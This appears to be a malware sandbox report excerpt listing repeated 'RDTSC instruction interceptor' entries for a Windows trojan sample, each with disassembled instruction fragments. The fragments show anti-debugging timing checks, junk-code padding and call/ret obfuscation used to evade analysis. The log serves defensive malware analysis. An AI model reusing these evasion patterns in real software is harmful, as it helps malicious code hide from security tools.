Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEBF5F second address: AEBF84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Eh 0x00000007 ja 00007FABC90CD75Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEBF84 second address: AEBFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FABC9471C34h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEBFA0 second address: AEBFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABC90CD769h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B18359 second address: B1835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B18752 second address: B1875C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FABC90CD756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B189EA second address: B189F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B106D7 second address: B106DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B106DD second address: B106FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C2Ah 0x00000009 popad 0x0000000a pop edi 0x0000000b jl 00007FABC9471C48h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FABC9471C26h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B106FB second address: B1070B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FABC90CD756h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1070B second address: B1070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B19B33 second address: B19B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B19C97 second address: B19CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jc 00007FABC9471C2Eh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007FABC9471C26h 0x00000014 pushad 0x00000015 jg 00007FABC9471C26h 0x0000001b jmp 00007FABC9471C2Bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushad 0x00000024 push esi 0x00000025 pop esi 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1A160 second address: B1A165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1A165 second address: B1A17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Ch 0x00000009 jc 00007FABC9471C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1D3E9 second address: B1D413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FABC90CD76Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1D511 second address: B1D53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jng 00007FABC9471C26h 0x0000000c jmp 00007FABC9471C2Dh 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1D53A second address: B1D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jno 00007FABC90CD75Ch 0x00000011 jo 00007FABC90CD75Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1EFF8 second address: B1EFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1EFFC second address: B1F01A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FABC90CD75Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FABC90CD756h 0x00000013 jne 00007FABC90CD756h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1F01A second address: B1F01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AE1CBD second address: AE1CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ah 0x00000007 jmp 00007FABC90CD763h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FABC90CD75Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B27174 second address: B27190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B26619 second address: B2661D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B268C0 second address: B268C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B268C6 second address: B268F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FABC90CD768h 0x0000000b popad 0x0000000c jl 00007FABC90CD770h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FABC90CD756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B268F4 second address: B268F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B268F8 second address: B268FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B26EA5 second address: B26EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FABC9471C26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2701A second address: B27049 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007FABC90CD756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d ja 00007FABC90CD78Ah 0x00000013 ja 00007FABC90CD767h 0x00000019 jmp 00007FABC90CD75Bh 0x0000001e jno 00007FABC90CD756h 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B28E88 second address: B28E93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FABC9471C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B28E93 second address: B28EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FABC90CD761h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FABC90CD75Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B28EBE second address: B28F6E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC9471C31h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FABC9471C39h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007FABC9471C34h 0x0000001b jnc 00007FABC9471C3Ah 0x00000021 jmp 00007FABC9471C34h 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FABC9471C28h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 mov si, 1908h 0x00000046 jmp 00007FABC9471C2Eh 0x0000004b push A36640D9h 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FABC9471C2Ch 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B28F6E second address: B28F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B293A9 second address: B293B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B29B4A second address: B29B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov edi, dword ptr [ebp+122D2D7Ch] 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FABC90CD764h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2A069 second address: B2A06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2A06D second address: B2A072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2A6B7 second address: B2A6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2CC6E second address: B2CC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2D74F second address: B2D753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2ED1A second address: B2ED2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2F721 second address: B2F78F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FABC9471C28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov esi, dword ptr [ebp+122D2D54h] 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d movzx edi, bx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FABC9471C28h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov dword ptr [ebp+1245AEB9h], edx 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push ecx 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2F78F second address: B2F795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2EA8C second address: B2EA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B2FF5F second address: B2FF7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FABC90CD767h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B34684 second address: B34688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B34688 second address: B3472A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d jmp 00007FABC90CD768h 0x00000012 pop ecx 0x00000013 pop ecx 0x00000014 nop 0x00000015 call 00007FABC90CD765h 0x0000001a mov di, dx 0x0000001d pop ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FABC90CD758h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FABC90CD758h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 add bx, 6340h 0x0000005b or dword ptr [ebp+1245FA01h], edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B33816 second address: B3381A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3472A second address: B34730 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B34730 second address: B34736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B34736 second address: B3473A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B375A6 second address: B375AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B375AA second address: B375F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FABC90CD758h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1E4Ch], edx 0x00000028 sub ebx, 48436E7Dh 0x0000002e push 00000000h 0x00000030 mov edi, 49840A2Ch 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007FABC90CD756h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B37871 second address: B3787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FABC9471C2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3A626 second address: B3A6C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FABC90CD758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FABC90CD773h 0x00000013 nop 0x00000014 mov bx, C6B4h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, dword ptr [ebp+1247E105h] 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FABC90CD758h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 clc 0x00000047 mov eax, dword ptr [ebp+122D06FDh] 0x0000004d cmc 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007FABC90CD758h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FABC90CD75Ch 0x00000072 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3A6C8 second address: B3A6DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3A6DE second address: B3A6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3D2B8 second address: B3D2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3D2BD second address: B3D2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC90CD763h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3D2DC second address: B3D2E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FABC9471C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3E2AD second address: B3E319 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov bx, cx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FABC90CD758h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b and bl, 00000064h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FABC90CD758h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a movzx edi, dx 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007FABC90CD75Ch 0x00000056 jo 00007FABC90CD756h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3E319 second address: B3E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jl 00007FABC9471C2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3C44C second address: B3C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3E4B2 second address: B3E4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3C451 second address: B3C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FABC90CD758h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, 30B7A5C0h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007FABC90CD766h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c stc 0x0000003d mov eax, dword ptr [ebp+122D0651h] 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FABC90CD758h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d call 00007FABC90CD761h 0x00000062 sbb edi, 2F5DA718h 0x00000068 pop ebx 0x00000069 xor ebx, 41FE2919h 0x0000006f push FFFFFFFFh 0x00000071 call 00007FABC90CD769h 0x00000076 clc 0x00000077 pop ebx 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jg 00007FABC90CD758h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B3F3A5 second address: B3F3AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
